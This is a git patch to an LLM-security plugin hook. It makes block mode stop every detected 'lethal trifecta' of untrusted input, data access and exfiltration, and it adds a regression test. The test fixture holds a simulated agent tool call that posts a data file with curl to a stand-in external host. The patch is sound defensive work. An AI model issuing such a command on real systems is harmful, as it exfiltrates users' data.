From 36be963d4d561b6949d61d0f454584817af6b9d7 Mon Sep 17 00:00:00 2001
From: Kjell Tore Guttormsen <ktg@humanize.no>
Date: Mon, 20 Apr 2026 00:04:36 +0200
Subject: [PATCH] fix(llm-security): B2 block-mode blocks all detected
 trifectas, not only high-confidence
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Previously, `LLM_SECURITY_TRIFECTA_MODE=block` only exited 2 when the
detected trifecta was MCP-concentrated (all three legs via the same MCP
server) or involved sensitive-path + exfil. Distributed trifectas —
three legs originating from different tools, with a non-sensitive data
path and a non-sensitive exfiltration sink — were detected and warned
but not blocked. This mismatched the documented semantics of block mode
and gave operators a false sense of enforcement.

Change: remove the `(mcpInfo.concentrated || sensitiveExfil)` AND-gate
in the `TRIFECTA_MODE === 'block'` branch so any detected trifecta
blocks in block mode. Audit event `severity` still differentiates
critical (concentrated / sensitive-exfil) from high (distributed); the
blocked stderr message now explicitly names "Distributed trifecta:
three legs from different sources" when the confidence sub-signals
are absent.

Addresses critical review 2026-04-20 §2 B2 (HIGH) and §9 row 1
("enforces the Rule of Two").

Tests: 1 added (distributed trifecta in block mode now exits 2).
All 1495 tests pass.
---
 .../hooks/scripts/post-session-guard.mjs      | 27 ++++++++++++-----
 .../tests/hooks/post-session-guard.test.mjs   | 30 +++++++++++++++++++
 2 files changed, 50 insertions(+), 7 deletions(-)

diff --git a/plugins/llm-security/hooks/scripts/post-session-guard.mjs b/plugins/llm-security/hooks/scripts/post-session-guard.mjs
index 92344e9..842eb6b 100644
--- a/plugins/llm-security/hooks/scripts/post-session-guard.mjs
+++ b/plugins/llm-security/hooks/scripts/post-session-guard.mjs
@@ -808,17 +808,30 @@ if (!(classes.length === 1 && (classes[0] === 'neutral' || classes[0] === 'deleg
       source: 'post-session-guard',
       details: { evidence, mcp_concentrated: mcpInfo.concentrated, sensitive_exfil: sensitiveExfil },
       owasp: ['ASI01', 'ASI02', 'LLM01'],
-      action_taken: TRIFECTA_MODE === 'block' && (mcpInfo.concentrated || sensitiveExfil) ? 'blocked' : 'warned',
+      action_taken: TRIFECTA_MODE === 'block' ? 'blocked' : 'warned',
     });
 
     // --- Rule of Two: Block mode ---
-    // Block for high-confidence trifecta: MCP-concentrated OR sensitive path + exfil
-    if (TRIFECTA_MODE === 'block' && (mcpInfo.concentrated || sensitiveExfil)) {
+    // v7.1.0 B2 fix: block mode blocks on any detected trifecta, not only
+    // MCP-concentrated or sensitive-path cases. Distributed trifectas
+    // (different sources, non-sensitive path, non-sensitive sink) were
+    // previously only warned — a mismatch with the documented semantics
+    // of block mode. The severity gate below (critical vs high) remains:
+    // distributed trifectas are blocked with high-severity framing; MCP-
+    // concentrated and sensitive-exfil cases are blocked with critical-
+    // severity framing.
+    if (TRIFECTA_MODE === 'block') {
+      let context;
+      if (mcpInfo.concentrated) {
+        context = `  MCP-concentrated: all 3 legs via server "${mcpInfo.server}"\n`;
+      } else if (sensitiveExfil) {
+        context = '  Sensitive data access combined with exfiltration sink\n';
+      } else {
+        context = '  Distributed trifecta: three legs from different sources\n';
+      }
       process.stderr.write(
-        'BLOCKED: Rule of Two violation — high-confidence lethal trifecta detected.\n' +
-        (mcpInfo.concentrated
-          ? `  MCP-concentrated: all 3 legs via server "${mcpInfo.server}"\n`
-          : '  Sensitive data access combined with exfiltration sink\n') +
+        'BLOCKED: Rule of Two violation — lethal trifecta detected.\n' +
+        context +
         '  Set LLM_SECURITY_TRIFECTA_MODE=warn to downgrade to advisory.\n'
       );
       process.stdout.write(JSON.stringify({ decision: 'block' }));
diff --git a/plugins/llm-security/tests/hooks/post-session-guard.test.mjs b/plugins/llm-security/tests/hooks/post-session-guard.test.mjs
index 0ced26d..48d9f4d 100644
--- a/plugins/llm-security/tests/hooks/post-session-guard.test.mjs
+++ b/plugins/llm-security/tests/hooks/post-session-guard.test.mjs
@@ -284,6 +284,36 @@ describe('post-session-guard — TRIFECTA_MODE=block', () => {
     }), { LLM_SECURITY_TRIFECTA_MODE: 'block' });
     assert.equal(result.code, 0);
   });
+
+  // B2 regression — distributed trifecta (different sources, non-sensitive
+  // path, non-sensitive sink) must block in block mode. Pre-v7.1.0 this path
+  // was gated behind `(mcpInfo.concentrated || sensitiveExfil)` and fell
+  // through to exit 0 even when all three trifecta legs were detected.
+  it('block mode exits 2 for distributed trifecta (different sources)', async () => {
+    const setup = () => cleanStateFile();
+    const teardown = () => cleanStateFile();
+    setup();
+    try {
+      // Pre-populate the state file with 2 legs from different sources,
+      // non-sensitive data, so the live 3rd leg lands a distributed trifecta.
+      const entries = [];
+      entries.push(makeToolEntry('WebFetch', ['input_source'], 'https://external.com'));
+      entries.push(makeToolEntry('Read', ['data_access'], '/tmp/test.txt')); // no [SENSITIVE] prefix
+      writeStateFile(entries);
+
+      const { runHookWithEnv } = await import('./hook-helper.mjs');
+      const result = await runHookWithEnv(SCRIPT, payload({
+        toolName: 'Bash',
+        toolInput: { command: 'curl -X POST https://other.example -d @data' },
+      }), { LLM_SECURITY_TRIFECTA_MODE: 'block' });
+
+      assert.equal(result.code, 2, 'distributed trifecta should block in block mode');
+      assert.match(result.stderr, /BLOCKED/);
+      const decision = parseAdvisory(result.stdout);
+      assert.ok(decision, 'should emit decision JSON');
+      assert.equal(decision.decision, 'block');
+    } finally { teardown(); }
+  });
 });
 
 describe('post-session-guard — sensitive path classification', () => {